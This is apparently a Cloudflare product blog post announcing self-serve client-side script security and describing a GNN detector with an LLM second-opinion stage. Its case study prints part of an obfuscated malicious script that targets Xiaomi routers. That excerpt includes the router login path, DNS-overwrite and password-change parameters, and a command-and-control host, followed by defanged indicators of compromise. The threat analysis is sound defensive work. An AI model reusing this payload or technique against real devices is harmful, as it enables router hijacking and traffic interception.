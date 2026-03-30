7 min read

Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it needs is just one malicious script tag.

If that sounds abstract, here are two recent examples of such skimming attacks:

In January 2026, Sansec reported a browser-side keylogger running on an employee merchandise store for a major U.S. bank, harvesting personal data, login credentials, and credit card information.

In September 2025, attackers published malicious releases of widely used npm packages . If those packages were bundled into front-end code, end users could be exposed to crypto-stealing in the browser.

To further our goal of building a better Internet, Cloudflare established a core tenet during our Birthday Week 2025 : powerful security features should be accessible without requiring a sales engagement . In pursuit of this objective, we are announcing two key changes today:

First, Cloudflare Client-Side Security Advanced (formerly Page Shield add-on) is now available to self-serve customers. And second, domain-based threat intelligence is now complimentary for all customers on the free Client-Side Security bundle .

In this post, we’ll explain how this product works and highlight a new AI detection system designed to identify malicious JavaScript while minimizing false alarms. We’ll also discuss several real-world applications for these tools.

How Cloudflare Client-Side Security works

Cloudflare Client-Side Security assesses 3.5 billion scripts per day, protecting 2,200 scripts per enterprise zone on average.

Under the hood, Client-Side Security collects these signals using browser reporting (for example, Content Security Policy ), which means you don’t need scanners or app instrumentation to get started, and there is zero latency impact to your web applications. The only prerequisite is that your traffic is proxied through Cloudflare.

Client-Side Security Advanced provides immediate access to powerful security features:

Smarter malicious script detection: Using in-house machine learning, this capability is now enhanced with assessments from a Large Language Model (LLM). Read more details below.

Code change monitoring: Continuous code change detection and monitoring is included, which is essential for meeting compliance like PCI DSS v4 , requirement 11.6.1.

Proactive blocking rules: Benefit from positive content security rules that are maintained and enforced through continuous monitoring.

Detecting malicious intent JavaScripts

Managing client-side security is a massive data problem. For an average enterprise zone, our systems observe approximately 2,200 unique scripts; smaller business zones frequently handle around 1,000. This volume alone is difficult to manage, but the real challenge is the volatility of the code.

Roughly a third of these scripts undergo code updates within any 30-day window. If a security team attempted to manually approve every new DOM (document object model) interaction or outbound connection, the resulting overhead would paralyze the development pipeline.

Instead, our detection strategy focuses on what a script is trying to do. That includes intent classification work we’ve written about previously . In short, we analyze the script's behavior using an Abstract Syntax Tree (AST). By breaking the code down into its logical structure, we can identify patterns that signal malicious intent, regardless of how the code is obfuscated.

The high cost of false positives

Client-side security operates differently than active vulnerability scanners deployed across the web, where a Web Application Firewall (WAF) would constantly observe matched attack signatures. While a WAF constantly blocks high-volume automated attacks, a client-side compromise (such as a breach of an origin server or a third-party vendor) is a rare, high-impact event. In an enterprise environment with rigorous vendor reviews and code scanning, these attacks are rare.

This rarity creates a problem. Because real attacks are infrequent, a security system’s detections are statistically more likely to be false positives. For a security team, these false alarms create fatigue and hide real threats. To solve this, we integrated a Large Language Model (LLM) into our detection pipeline, drastically reducing the false positive rate.

Adding an LLM-based second opinion for triage

Our frontline detection engine is a Graph Neural Network (GNN). GNNs are particularly well-suited for this task: they operate on the Abstract Syntax Tree (AST) of the JavaScript code, learning structural representations that capture execution patterns regardless of variable renaming, minification, or obfuscation. In machine learning terms, the GNN learns an embedding of the code’s graph structure that generalizes across syntactic variations of the same semantic behavior.

The GNN is tuned for high recall. We want to catch novel, zero-day threats. Its precision is already remarkably high: less than 0.3% of total analyzed traffic is flagged as a false positive (FP). However, at Cloudflare’s scale of 3.5 billion scripts assessed daily , even a sub-0.3% FP rate translates to a volume of false alarms that can be disruptive to customers.

The core issue is a classic class imbalance problem. While we can collect extensive malicious samples, the sheer diversity of benign JavaScript across the web is practically infinite. Heavily obfuscated but perfectly legitimate scripts — like bot challenges, tracking pixels, ad-tech bundles, and minified framework builds — can exhibit structural patterns that overlap with malicious code in the GNN’s learned feature space. As much as we try to cover a huge variety of interesting benign cases, the model simply has not seen enough of this infinite variety during training.

This is precisely where Large Language Models (LLMs) complement the GNN. LLMs possess a deep semantic understanding of real-world JavaScript practices: they recognize domain-specific idioms, common framework patterns, and can distinguish sketchy-but-innocuous obfuscation from genuinely malicious intent.

Rather than replacing the GNN, we designed a cascading classifier architecture:

Every script is first evaluated by the GNN. If the GNN predicts the script as benign, the detection pipeline terminates immediately. This incurs only the minimal latency of the GNN for the vast majority of traffic, completely bypassing the heavier computation time of the LLM. If the GNN flags the script as potentially malicious (above the decision threshold), the script is forwarded to an open-source LLM hosted on Cloudflare Workers AI for a second opinion. The LLM, provided with a security-specialized prompt context, semantically evaluates the script’s intent. If it determines the script is benign, it overrides the GNN’s verdict.

This two-stage design gives us the best of both worlds: the GNN’s high recall for structural malicious patterns, combined with the LLM’s broad semantic understanding to filter out false positives.

As we previously explained , our GNN is trained on publicly accessible script URLs, the same scripts any browser would fetch. The LLM inference at runtime runs entirely within Cloudflare’s network via Workers AI using open-source models (we currently use gpt-oss-120b ).

As an additional safety net, every script flagged by the GNN is logged to Cloudflare R2 for posterior analysis. This allows us to continuously audit whether the LLM’s overrides are correct and catch any edge cases where a true attack might have been inadvertently filtered out. Yes, we dogfood our own storage products for our own ML pipeline.

The results from our internal evaluations on real production traffic are compelling. Focusing on total analyzed traffic under the JS Integrity threat category, the secondary LLM validation layer reduced false positives by nearly 3x: dropping the already low ~0.3% FP rate down to ~0.1%. When evaluating unique scripts, the impact is even more dramatic: the FP rate plummets a whopping ~200x, from ~1.39% down to just 0.007%.

At our scale, cutting the overall false positive rate by two-thirds translates to millions fewer false alarms for our customers every single day. Crucially, our True Positive (actual attack) detection capability includes a fallback mechanism:as noted above, we audit the LLM’s overrides to check for possible true attacks that were filtered by the LLM.

Because the LLM acts as a highly reliable precision filter in this pipeline, we can now afford to lower the GNN’s decision threshold, making it even more aggressive. This means we catch novel, highly obfuscated True Attacks that would have previously fallen just below the detection boundary, all without overwhelming customers with false alarms. In the next phase, we plan to push this even further.

Catching zero-days in the wild: The core.js router exploit

This two-stage architecture is already proving its worth in the wild. Just recently, our detection pipeline flagged a novel, highly obfuscated malicious script ( core.js ) targeting users in specific regions.

In this case, the payload was engineered to commandeer home routers (specifically Xiaomi OpenWrt-based devices). Upon closer inspection via deobfuscation, the script demonstrated significant situational awareness: it queries the router's WAN configuration (dynamically adapting its payload using parameters like wanType=dhcp , wanType=static , and wanType=pppoe ), overwrites the DNS settings to hijack traffic through Chinese public DNS servers, and even attempts to lock out the legitimate owner by silently changing the admin password. Instead of compromising a website directly, it had been injected into users' sessions via compromised browser extensions.

To evade detection, the script's core logic was heavily minified and packed using an array string obfuscator — a classic trick, but effective enough that traditional threat intelligence platforms like VirusTotal have not yet reported detections at the time of this writing.

Our GNN successfully revealed the underlying malicious structure despite the obfuscation, and the Workers AI LLM confidently confirmed the intent. Here is a glimpse of the payload showing the target router API and the attempt to inject a rogue DNS server:

const _0x1581=['bXhqw','=sSMS9WQ3RXc','cookie','qvRuU','pDhcS','WcQJy','lnqIe','oagRd','PtPlD','catch','defaultUrl','rgXPslXN','9g3KxI1b','123123123','zJvhA','content','dMoLJ','getTime','charAt','floor','wZXps','value','QBPVX','eJOgP','WElmE','OmOVF','httpOnly','split','userAgent','/?code=10&asyn=0&auth=','nonce=','dsgAq','VwEvU','==wb1kHb9g3KxI1b','cNdLa','W748oghc9TefbwK','_keyStr','parse','BMvDU','JYBSl','SoGNb','vJVMrgXPslXN','=Y2KwETdSl2b','816857iPOqmf','uexax','uYTur','LgIeF','OwlgF','VkYlw','nVRZT','110594AvIQbs','LDJfR','daPLo','pGkLa','nbWlm','responseText','20251212','EKjNN','65kNANAl','.js','94963VsBvZg','WuMYz','domain','tvSin','length','UBDtu','pfChN','1TYbnhd','charCodeAt','/cgi-bin/luci/api/xqsystem/login','http://192.168.','trace','https://api.qpft5.com','&newPwd=','mWHpj','wanType','XeEyM','YFBnm','RbRon','xI1bxI1b','fBjZQ','shift','=8yL1kHb9g3KxI1b','http://','LhGKV','AYVJu','zXrRK','status','OQjnd','response','AOBSe','eTgcy','cEKWR','&dns2=','fzdsr','filter','FQXXx','Kasen','faDeG','vYnzx','Fyuiu','379787JKBNWn','xiroy','mType','arGpo','UFKvk','tvTxu','ybLQp','EZaSC','UXETL','IRtxh','HTnda','trim','/fee','=82bv92bv92b','BGPKb','BzpiL','MYDEF','lastIndexOf','wypgk','KQMDB','INQtL','YiwmN','SYrdY','qlREc','MetQp','Wfvfh','init','/ds','HgEOZ','mfsQG','address','cDxLQ','owmLP','IuNCv','=syKxEjUS92b','then','createOffer','aCags','tJHgQ','JIoFh','setItem','ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','Kwshb','ETDWH','0KcgeX92i0efbwK','stringify','295986XNqmjG','zfJMl','platform','NKhtt','onreadystatechange','88888888','push','cJVJO','XPOwd','gvhyl','ceZnn','fromCharCode',';Secure','452114LDbVEo','vXkmg','open','indexOf','UiXXo','yyUvu','ddp','jHYBZ','iNWCL','info','reverse','i4Q18Pro9TefbwK','mAPen','3960IiTopc','spOcD','dbKAM','ZzULq','bind','GBSxL','=A3QGRFZxZ2d','toUpperCase','AvQeJ','diWqV','iXtgM','lbQFd','iOS','zVowQ','jTeAP','wanType=dhcp&autoset=1&dns1=','fNKHB','nGkgt','aiEOB','dpwWd','yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW','encode','gWYAY','mckDW','createDataChannel']; const _0x4b08=function(_0x5cc416,_0x2b0c4c){_0x5cc416=_0x5cc416-0x1d5;let _0xd00112=_0x1581[_0x5cc416];return _0xd00112;}; (function(_0x3ff841,_0x4d6f8b){const _0x45acd8=_0x4b08;while(!![]){try{const _0x1933aa=-parseInt(_0x45acd8(0x275))*-parseInt(_0x45acd8(0x264))+-parseInt(_0x45acd8(0x1ff))+parseInt(_0x45acd8(0x25d))+-parseInt(_0x45acd8(0x297))+parseInt(_0x45acd8(0x20c))+parseInt(_0x45acd8(0x26e))+-parseInt(_0x45acd8(0x219))*parseInt(_0x45acd8(0x26c));if(_0x1933aa===_0x4d6f8b)break;else _0x3ff841['push'](_0x3ff841['shift']());}catch(_0x8e5119){_0x3ff841['push'](_0x3ff841['shift']());}}}(_0x1581,0x842ab));

This is exactly the kind of sophisticated, zero-day threat that a static signature-based WAF would miss but our structural and semantic AI approach catches.

Indicators of Compromise (IOCs)

URL: hxxps://ns[.]qpft5[.]com/ads/core[.]js

SHA-256: 4f2b7d46148b786fae75ab511dc27b6a530f63669d4fe9908e5f22801dea9202

C2 Domain: hxxps://api[.]qpft5[.]com

Domain-based threat intelligence free for all

Today we are making domain-based threat intelligence available to all Cloudflare Client-Side Security customers, regardless of whether you use the Advanced offering.

In 2025, we saw many non-enterprise customers affected by client-side attacks, particularly those customers running webshops on the Magento platform. These attacks persisted for days or even weeks after they were publicized. Small and medium-sized companies often lack the enterprise-level resources and expertise needed to maintain a high security standard.

By providing domain-based threat intelligence to everyone, we give site owners a critical, direct signal of attacks affecting their users. This information allows them to take immediate action to clean up their site and investigate potential origin compromises.

To begin, simply enable Client-Side Security with a toggle in the dashboard . We will then highlight any JavaScript or connections associated with a known malicious domain.

Get started with Client-Side Security Advanced for PCI DSS v4

To learn more about Client-Side Security Advanced pricing, please visit the plans page . Before committing, we will estimate the cost based on your last month’s HTTP requests, so you know exactly what to expect.